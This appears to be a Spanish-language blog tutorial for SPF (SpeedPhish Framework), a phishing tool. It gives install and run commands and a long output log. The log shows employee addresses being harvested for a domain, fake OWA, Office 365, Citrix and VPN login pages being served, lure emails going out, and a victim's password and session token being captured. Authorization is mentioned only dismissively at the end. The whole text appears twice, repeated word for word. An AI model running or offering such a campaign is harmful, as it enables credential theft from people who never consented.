¿Estás en el chiringuito de playa y sientes la necesidad de juakear a algo o a alguien?, ¿sientes la llamada de la ingeniería social? ¿qué tal un phishing rápido?. Déjame decirte primero que estás enfermo... y luego hablarte de SPF (SpeedPhish Framework), una herramienta escrita en python diseñada para realizar un rápido reconocimiento y desarrollo de phishings. Así que levanta la tapa de tu netbook y empieza a teclear...
Requisitos & instalación
apt-get update
apt-get upgrade -y
apt-get install build-essential python-dev python-pip phantomjs -y
pip install dnspython
pip install twisted
git clone https://github.com/tatanus/SPF.git
Ejecución
cd spf
python spf.py --all -d dominio.com (si has configurado previamente la pasarela SMTP y no quieres mandar los correos a las víctimas usa mejor --test)
[!] A CONFIG FILE was not specified... defaulting to [default.cfg]
/home/vmotos/SPF/spf/dominio.com/
/home/vmotos/SPF/spf/dominio.com/spf.sqlite
/home/vmotos/SPF/spf/dominio.com/spf.sqlite
[*] Obtaining list of email targets
[*] [VERBOSE] Gathering emails via built-in methods
[*] [VERBOSE] Currently searching [google, bing, ask, dogpile, yandex, baidu, yahoo, duckduckgo]
[*] [VERBOSE] [Processing: /] Google
[*] [VERBOSE] [Processing: -] Bing
[*] [VERBOSE] [Processing: /] Ask
[*] [VERBOSE] [Processing: /] Dogpile
[*] [VERBOSE] [Processing: -] Yandex
[*] [VERBOSE] [Processing: /] Baidu
[*] [VERBOSE] [Processing: /] Yahoo
[*] [VERBOSE] [Processing: |] DuckDuckGo
[*] [VERBOSE] Gathered [14] email addresses from the Internet
[*] [VERBOSE] Gathering emails via theHarvester
[!] ERROR: theHarvester_path does not point to a valid file
[*] [VERBOSE] Collected [14] unique email addresses
[*] ----------
[*] EMAIL LIST
[*] ----------
[*] pepito@dominio.com
[*] datacenter@dominio.com
[*] I@dominio.com
[*] pedro.sanchez@dominio.com
[*] javier.martin@dominio.com
[*] prodriguez@dominio.com
[*] compania@dominio.com
[*] datacenter@dominio.com
[*] dalvarez@dominio.com
[*] jgarcia@dominio.com
[*] informatica@dominio.com
[*] lmartinez@dominio.com
[*] n@dominio.com
[*] resecionsas@dominio.com
[*] Starting phishing webserver
[*] [VERBOSE] /home/vmotos/SPF/spf/dominio.com/spf.sqlite
[*] [VERBOSE] /home/vmotos/SPF/spf/dominio.com/spf.sqlite
[*] [VERBOSE] FIXED = [templates/web/owa]
[*] [VERBOSE] FIXED = [templates/web/office365]
[*] [VERBOSE] FIXED = [templates/web/cisco]
[*] [VERBOSE] FIXED = [templates/web/citrix]
[*] [VERBOSE] FIXED = [templates/web/citrix2]
[*] [VERBOSE] FIXED = [templates/web/juniper_vpn]
[*] [VERBOSE] Found the following web sites: [templates/web/owa/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/office365/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/cisco/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/citrix/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/citrix2/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/juniper_vpn/CONFIG]
[*] [VERBOSE] Started website [cisco_vpn ] on [http://169.168.1.200:8000]
[*] [VERBOSE] Started website [citrix2 ] on [http://169.168.1.200:8001]
[*] [VERBOSE] Started website [junipervpn] on [http://169.168.1.200:8002]
[*] [VERBOSE] Started website [owa ] on [http://169.168.1.200:8003]
[*] [VERBOSE] Started website [office365 ] on [http://169.168.1.200:8004]
[*] [VERBOSE] Started website [citrix ] on [http://169.168.1.200:8005]
[*] [VERBOSE] Created VHOST [cisco_vpn.dominio.com ] -> [http://169.168.1.200:8000]
[*] [VERBOSE] Created VHOST [citrix2.dominio.com ] -> [http://169.168.1.200:8001]
[*] [VERBOSE] Created VHOST [junipervpn.dominio.com] -> [http://169.168.1.200:8002]
[*] [VERBOSE] Created VHOST [owa.example.com ] -> [http://169.168.1.200:8003]
[*] [VERBOSE] Created VHOST [office365.example.com ] -> [http://169.168.1.200:8004]
[*] [VERBOSE] Created VHOST [citrix.dominio.com ] -> [http://169.168.1.200:8005]
[*] [VERBOSE] Started WebServer with pid = [5077]
[*] [VERBOSE] Locating phishing email templates
[*] [DEBUG] Found the following email template: [templates/email/citrix.txt]
[*] [DEBUG] Found the following email template: [templates/email/office365.txt]
[*] [DEBUG] Found the following email template: [templates/email/dynamic.txt]
[*] [DEBUG] Found the following email template: [templates/email/citrix2.txt]
[*] [DEBUG] Found the following email template: [templates/email/owa.txt]
[*] Sending phishing emails
[*] [VERBOSE] Sending Email to [pepito@dominio.com]
[*] Would have sent an email to [pepito@dominio.com] with subject of [New OWA Server], but this was just a test.
[*] [VERBOSE] Sending Email to [datacenter@dominio.com]
[*] Would have sent an email to [datacenter@dominio.com] with subject of [Webmail - Office 365], but this was just a test.
[*] [VERBOSE] Sending Email to [I@dominio.com]
[*] Would have sent an email to [I@dominio.com] with subject of [New Login Portal], but this was just a test.
[*] [VERBOSE] Sending Email to [pedro.sanchez@dominio.com]
[*] Would have sent an email to [pedro.sanchez@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [javier.martin@dominio.com]
[*] Would have sent an email to [javier.martin@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [prodriguez@dominio.com]
[*] Would have sent an email to [prodriguez@dominio.com] with subject of [New OWA Server], but this was just a test.
[*] [VERBOSE] Sending Email to [compania@dominio.com]
[*] Would have sent an email to [compania@dominio.com] with subject of [Webmail - Office 365], but this was just a test.
[*] [VERBOSE] Sending Email to [datacenter@dominio.com]
[*] Would have sent an email to [datacenter@dominio.com] with subject of [New Login Portal], but this was just a test.
[*] [VERBOSE] Sending Email to [dalvarez@dominio.com]
[*] Would have sent an email to [dalvarez@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [jgarcia@dominio.com]
[*] Would have sent an email to [jgarcia@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [informatica@dominio.com]
[*] Would have sent an email to [informatica@dominio.com] with subject of [New OWA Server], but this was just a test.
[*] [VERBOSE] Sending Email to [lmanzanares@dominio.com]
[*] Would have sent an email to [lmanzanares@dominio.com] with subject of [Webmail - Office 365], but this was just a test.
[*] [VERBOSE] Sending Email to [n@dominio.com]
[*] Would have sent an email to [n@dominio.com] with subject of [New Login Portal], but this was just a test.
[*] [VERBOSE] Sending Email to [resecionsas@dominio.com]
[*] Would have sent an email to [resecionsas@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] Monitoring phishing website activity!
Ahora ábrete otra cervezita y a esperar...
[*] (Press CTRL-C to stop collection and generate report!)
[*] ::citrix2:: 2015.07.16-13.21.44,[ACCESS],192.168.2.7
[*] ::citrix2:: 2015.07.16-13.21.58,[CREDENTIALS],192.168.2.7,password=['prueba123'], user=['pepito@dominio.com'], LoginType=['Explicit'], SESSION_TOKEN=['05F56F0AD6F7D8CD25E08F2BB935866E']
¡Bingo!
pd. Ni que decir tiene que el phishing ha de hacerse tras previa autorización del dueño o responsable correspondiente del dominio y blah, blah,... ¡sed buenos!
Requisitos & instalación
apt-get update
apt-get upgrade -y
apt-get install build-essential python-dev python-pip phantomjs -y
pip install dnspython
pip install twisted
git clone https://github.com/tatanus/SPF.git
Ejecución
cd spf
python spf.py --all -d dominio.com (si has configurado previamente la pasarela SMTP y no quieres mandar los correos a las víctimas usa mejor --test)
[!] A CONFIG FILE was not specified... defaulting to [default.cfg]
/home/vmotos/SPF/spf/dominio.com/
/home/vmotos/SPF/spf/dominio.com/spf.sqlite
/home/vmotos/SPF/spf/dominio.com/spf.sqlite
[*] Obtaining list of email targets
[*] [VERBOSE] Gathering emails via built-in methods
[*] [VERBOSE] Currently searching [google, bing, ask, dogpile, yandex, baidu, yahoo, duckduckgo]
[*] [VERBOSE] [Processing: /] Google
[*] [VERBOSE] [Processing: -] Bing
[*] [VERBOSE] [Processing: /] Ask
[*] [VERBOSE] [Processing: /] Dogpile
[*] [VERBOSE] [Processing: -] Yandex
[*] [VERBOSE] [Processing: /] Baidu
[*] [VERBOSE] [Processing: /] Yahoo
[*] [VERBOSE] [Processing: |] DuckDuckGo
[*] [VERBOSE] Gathered [14] email addresses from the Internet
[*] [VERBOSE] Gathering emails via theHarvester
[!] ERROR: theHarvester_path does not point to a valid file
[*] [VERBOSE] Collected [14] unique email addresses
[*] ----------
[*] EMAIL LIST
[*] ----------
[*] pepito@dominio.com
[*] datacenter@dominio.com
[*] I@dominio.com
[*] pedro.sanchez@dominio.com
[*] javier.martin@dominio.com
[*] prodriguez@dominio.com
[*] compania@dominio.com
[*] datacenter@dominio.com
[*] dalvarez@dominio.com
[*] jgarcia@dominio.com
[*] informatica@dominio.com
[*] lmartinez@dominio.com
[*] n@dominio.com
[*] resecionsas@dominio.com
[*] Starting phishing webserver
[*] [VERBOSE] /home/vmotos/SPF/spf/dominio.com/spf.sqlite
[*] [VERBOSE] /home/vmotos/SPF/spf/dominio.com/spf.sqlite
[*] [VERBOSE] FIXED = [templates/web/owa]
[*] [VERBOSE] FIXED = [templates/web/office365]
[*] [VERBOSE] FIXED = [templates/web/cisco]
[*] [VERBOSE] FIXED = [templates/web/citrix]
[*] [VERBOSE] FIXED = [templates/web/citrix2]
[*] [VERBOSE] FIXED = [templates/web/juniper_vpn]
[*] [VERBOSE] Found the following web sites: [templates/web/owa/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/office365/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/cisco/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/citrix/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/citrix2/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/juniper_vpn/CONFIG]
[*] [VERBOSE] Started website [cisco_vpn ] on [http://169.168.1.200:8000]
[*] [VERBOSE] Started website [citrix2 ] on [http://169.168.1.200:8001]
[*] [VERBOSE] Started website [junipervpn] on [http://169.168.1.200:8002]
[*] [VERBOSE] Started website [owa ] on [http://169.168.1.200:8003]
[*] [VERBOSE] Started website [office365 ] on [http://169.168.1.200:8004]
[*] [VERBOSE] Started website [citrix ] on [http://169.168.1.200:8005]
[*] [VERBOSE] Created VHOST [cisco_vpn.dominio.com ] -> [http://169.168.1.200:8000]
[*] [VERBOSE] Created VHOST [citrix2.dominio.com ] -> [http://169.168.1.200:8001]
[*] [VERBOSE] Created VHOST [junipervpn.dominio.com] -> [http://169.168.1.200:8002]
[*] [VERBOSE] Created VHOST [owa.example.com ] -> [http://169.168.1.200:8003]
[*] [VERBOSE] Created VHOST [office365.example.com ] -> [http://169.168.1.200:8004]
[*] [VERBOSE] Created VHOST [citrix.dominio.com ] -> [http://169.168.1.200:8005]
[*] [VERBOSE] Started WebServer with pid = [5077]
[*] [VERBOSE] Locating phishing email templates
[*] [DEBUG] Found the following email template: [templates/email/citrix.txt]
[*] [DEBUG] Found the following email template: [templates/email/office365.txt]
[*] [DEBUG] Found the following email template: [templates/email/dynamic.txt]
[*] [DEBUG] Found the following email template: [templates/email/citrix2.txt]
[*] [DEBUG] Found the following email template: [templates/email/owa.txt]
[*] Sending phishing emails
[*] [VERBOSE] Sending Email to [pepito@dominio.com]
[*] Would have sent an email to [pepito@dominio.com] with subject of [New OWA Server], but this was just a test.
[*] [VERBOSE] Sending Email to [datacenter@dominio.com]
[*] Would have sent an email to [datacenter@dominio.com] with subject of [Webmail - Office 365], but this was just a test.
[*] [VERBOSE] Sending Email to [I@dominio.com]
[*] Would have sent an email to [I@dominio.com] with subject of [New Login Portal], but this was just a test.
[*] [VERBOSE] Sending Email to [pedro.sanchez@dominio.com]
[*] Would have sent an email to [pedro.sanchez@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [javier.martin@dominio.com]
[*] Would have sent an email to [javier.martin@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [prodriguez@dominio.com]
[*] Would have sent an email to [prodriguez@dominio.com] with subject of [New OWA Server], but this was just a test.
[*] [VERBOSE] Sending Email to [compania@dominio.com]
[*] Would have sent an email to [compania@dominio.com] with subject of [Webmail - Office 365], but this was just a test.
[*] [VERBOSE] Sending Email to [datacenter@dominio.com]
[*] Would have sent an email to [datacenter@dominio.com] with subject of [New Login Portal], but this was just a test.
[*] [VERBOSE] Sending Email to [dalvarez@dominio.com]
[*] Would have sent an email to [dalvarez@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [jgarcia@dominio.com]
[*] Would have sent an email to [jgarcia@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [informatica@dominio.com]
[*] Would have sent an email to [informatica@dominio.com] with subject of [New OWA Server], but this was just a test.
[*] [VERBOSE] Sending Email to [lmanzanares@dominio.com]
[*] Would have sent an email to [lmanzanares@dominio.com] with subject of [Webmail - Office 365], but this was just a test.
[*] [VERBOSE] Sending Email to [n@dominio.com]
[*] Would have sent an email to [n@dominio.com] with subject of [New Login Portal], but this was just a test.
[*] [VERBOSE] Sending Email to [resecionsas@dominio.com]
[*] Would have sent an email to [resecionsas@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] Monitoring phishing website activity!
Ahora ábrete otra cervezita y a esperar...
[*] (Press CTRL-C to stop collection and generate report!)
[*] ::citrix2:: 2015.07.16-13.21.44,[ACCESS],192.168.2.7
[*] ::citrix2:: 2015.07.16-13.21.58,[CREDENTIALS],192.168.2.7,password=['prueba123'], user=['pepito@dominio.com'], LoginType=['Explicit'], SESSION_TOKEN=['05F56F0AD6F7D8CD25E08F2BB935866E']
¡Bingo!
pd. Ni que decir tiene que el phishing ha de hacerse tras previa autorización del dueño o responsable correspondiente del dominio y blah, blah,... ¡sed buenos!
Comentarios
Publicar un comentario